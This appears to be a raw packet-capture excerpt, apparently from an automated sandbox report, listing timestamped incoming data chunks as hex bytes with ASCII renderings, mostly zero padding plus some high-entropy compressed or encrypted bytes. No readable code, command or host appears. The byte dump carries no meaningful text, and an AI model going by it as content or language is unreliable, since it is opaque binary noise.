                                                                                                                            2023-03-21 07:00:12 UTC3588INData Raw: 86 2b 00 5f 31 04 86 51 08 1b 35 34 86 53 d4 c4 45 e9 ce c2 f4 44 15 d2 0d 04 a3 01 8f 36 10 5c 09 f8 ca 21 10 8c 41 d8 98 a1 11 28 1c 41 86 b3 30 23 81 20 c3 40 70 15 e0 ab 0c 04 57 03 be 7a 08 04 63 11 36 76 68 04 93 38 82 4c 67 61 66 02 41 a6 81 60 1c e0 71 06 02 64 54 38 7e 08 04 13 10 36 61 68 04 cd 66 81 2f cb 1f b1 9c b1 ec 73 1e 91 e4 0e c8 28 cb 39 cb 01 f9 c2 04 69 fd bf 23 54 cb 7e 61 da f5 90 e2 45 27 9d 85 27 13 a5 38 69 94 e2 0b c0 5f 18 a5 f8 12 f0 97 43 94 e2 2b 84 7d 35 74 29 0a e8 80 45 91 ea 2c 54 13 08 54 03 41 07 e0 0e 03 c1 29 c0 a7 86 40 10 43 58 6c 68 04 f4 e8 2d 2b ea 74 16 76 26 10 74 1a 08 be 06 fc b5 81 e0 1b c0 df 0c 81 e0 34 c2 4e 0f 8d 60 2d 47 d0 e5 2c ec 4a 20 e8 32 10 9c 01 7c c6 40 70 16 f0 d9 21 10 9c 43 d8 b9 a1 11 f0
                                                                                                                            Data Ascii: +_1Q54SED6\!A(A0# @pWzc6vh8LgafA`qdT8~6ahf/s(9i#T~aE''8i_C+}5t)E,TTA)@CXlh-+tv&t4N`-G,J 2|@p!C
                                                                                                                            2023-03-21 07:00:12 UTC3604INData Raw: 20 8e fc ca ed 90 ef 1d ef 20 30 10 bc d3 07 63 3a 7a 9d 2f 6e 19 88 5e b5 8b b0 43 ee 76 34 f2 a0 5c 90 4e 0f db 9d 2f c9 8b 57 8d 49 d2 d0 ef b4 c6 1f 1f 24 b4 f5 69 c0 a6 70 bc 4c 55 48 79 b4 19 3f fa 11 73 70 71 91 2c 0f 80 fa 52 20 fb 1c 05 7e 65 21 44 15 eb 21 7e e5 04 75 ce 91 0e c2 b9 3c 7a 33 9e 99 b0 f9 97 30 e6 d0 22 de 1a 2d a4 fe 7b 5e 57 76 fe 99 2e 38 d9 03 49 a5 7d f3 70 f7 81 93 7c 27 a4 7d 39 1a 7a 6a 35 57 60 03 3c 16 29 09 a5 75 10 0d d1 cb de 13 52 30 0f 4d 8c 4d 24 5c 7c 0a bc 2b 11 51 3e 7a 42 bf 6a f8 7e 05 29 42 ce e5 0c 5c be be a1 dd 6e c5 f9 c7 91 40 16 f7 70 48 12 7a 9b 12 4b e1 0b 99 f1 61 61 22 49 aa 40 83 bb 96 0a a9 28 22 25 55 88 a7 d7 70 8d 68 92 0c de be c9 35 6e 63 6f 6b b9 c6 0a f6 f6 6d ae f1 b6 09 b8 52 ed 3a 5e 2a
                                                                                                                            Data Ascii: 0c:z/n^Cv4\N/WI$ipLUHy?spq,R ~e!D!~u<z30"-{^Wv.8I}p|'}9zj5W`<)uR0MM$\|+Q>zBj~)B\n@pHzKaa"I@("%Uph5ncokmR:^*
                                                                                                                            2023-03-21 07:00:12 UTC3620INData Raw: f8 73 9b 95 df 5f c2 ef eb f0 17 bd d2 e3 12 aa 32 35 fc a8 e8 f1 26 86 78 14 79 40 da 2a da 4c 78 69 dd 6a dc f0 00 08 b1 c5 78 35 dd 57 ac f5 96 f4 82 e8 63 07 21 44 ef 77 41 07 a2 36 14 c2 10 35 5a 0c b8 53 70 70 8b c9 78 f7 b3 3e cf e5 4d d7 c2 aa c5 ba bc 73 d0 f8 c4 4e 34 4c 3a b0 08 8d 08 0c 0a 44 07 99 14 1b 01 83 7c 3d 94 e2 33 8c d7 26 cf 9c 58 b9 4a d2 0b d3 35 f1 3d 78 7a 64 0f 6d 7f 00 20 21 ac dd b8 98 5a 06 69 80 92 56 f5 5f 12 db 7d b7 42 31 5a 21 a0 93 87 7b 4e 3c 9c 24 dc a2 dd f4 89 38 c6 f7 60 c4 cb ae 92 46 ba 44 1d 75 4e 6f 14 ce ea 5c de 14 a1 5e 67 fd 68 fd df a5 61 7a 7f 6e b3 97 85 72 2a e3 fe c6 cd 42 be 86 9b 22 ae a0 6e be 9d ec ee 79 2e 8f cc 99 45 23 fa ba f7 ce 15 8c 3a 61 a6 96 27 95 f1 3b 9c 79 43 dc 63 8b 2b cc 5e 5b ab
                                                                                                                            Data Ascii: s_25&xy@*Lxijx5Wc!DwA65ZSppx>MsN4L:D|=3&XJ5=xzdm !ZiV_}B1Z!{N<$8`FDuNo\^ghaznr*B"ny.E#:a';yCc+^[
                                                                                                                            2023-03-21 07:00:12 UTC3636INData Raw: fb b2 fc 1b 2e e2 2c db dd df 80 20 ad 3c 25 8d b4 e3 00 53 fb 17 fe 5c 74 c1 c4 b9 0e fb b7 48 e3 99 af ea fe 56 7d 3a b8 60 e0 a0 4b 90 9c 0e 68 7b aa 1e 42 4e a5 f8 d8 72 fe 95 bb fb d9 d3 76 8c fa 8e de bf 74 f1 b8 7b 5f 92 0a 30 50 c9 91 08 5b 46 e8 7f 1b 12 55 e8 a1 a3 72 10 30 b6 05 a3 9b 7b b7 df d5 b7 71 9b 7f c1 a8 1f fb 91 62 66 8a c2 5c 83 3b e5 41 c5 1a ff 37 ec 68 de b6 b4 ce ad 1d 37 5c c8 db af 45 e3 64 70 1e f5 e7 bb 25 83 a6 3f 62 51 54 e4 1c 55 ab 62 58 fb ce 7f 1f 12 e3 fc 96 98 a2 96 c2 63 34 5d b2 2f cf ce 19 df db 8d bf 13 41 88 b0 78 f0 9c 8c 54 43 ed 93 48 41 ee a7 4e 5a c7 ef f5 71 77 5f e4 44 07 a2 91 0f 2a 42 05 70 ae 02 ea 5c ea df 1c 50 38 fc c9 1f a9 fe 1d 4b 80 e3 56 6a a3 f6 fb 37 02 82 95 fc 6e 96 a4 ea e8 11 e1 de 9a 8a
                                                                                                                            Data Ascii: ., <%S\tHV}:`Kh{BNrvt{_0P[FUr0{qbf\;A7h7\Edp%?bQTUbXc4]/AxTCHANZqw_D*Bp\P8KVj7n
                                                                                                                            2023-03-21 07:00:12 UTC3652INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC3668INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 07 87 04 00 00 00 00 82 fe bf 36 f9 02 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 06
                                                                                                                            2023-03-21 07:00:12 UTC3684INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC3700INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3716INData Raw: 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: A_|
                                                                                                                            2023-03-21 07:00:12 UTC3732INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 07 87 04 00 00 00 00 82 fe bf 36 f9 02 00 00 00
                                                                                                                            Data Ascii: `6
                                                                                                                            2023-03-21 07:00:12 UTC3748INData Raw: 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC3764INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC3780INData Raw: 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
                                                                                                                            2023-03-21 07:00:12 UTC3796INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 07 87 04 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3811INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC3827INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3843INData Raw: 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|0
                                                                                                                            2023-03-21 07:00:12 UTC3859INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3875INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3891INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:12 UTC3907INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|`
                                                                                                                            2023-03-21 07:00:12 UTC3923INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:12 UTC3939INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3939INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3955INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:12 UTC3971INData Raw: 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
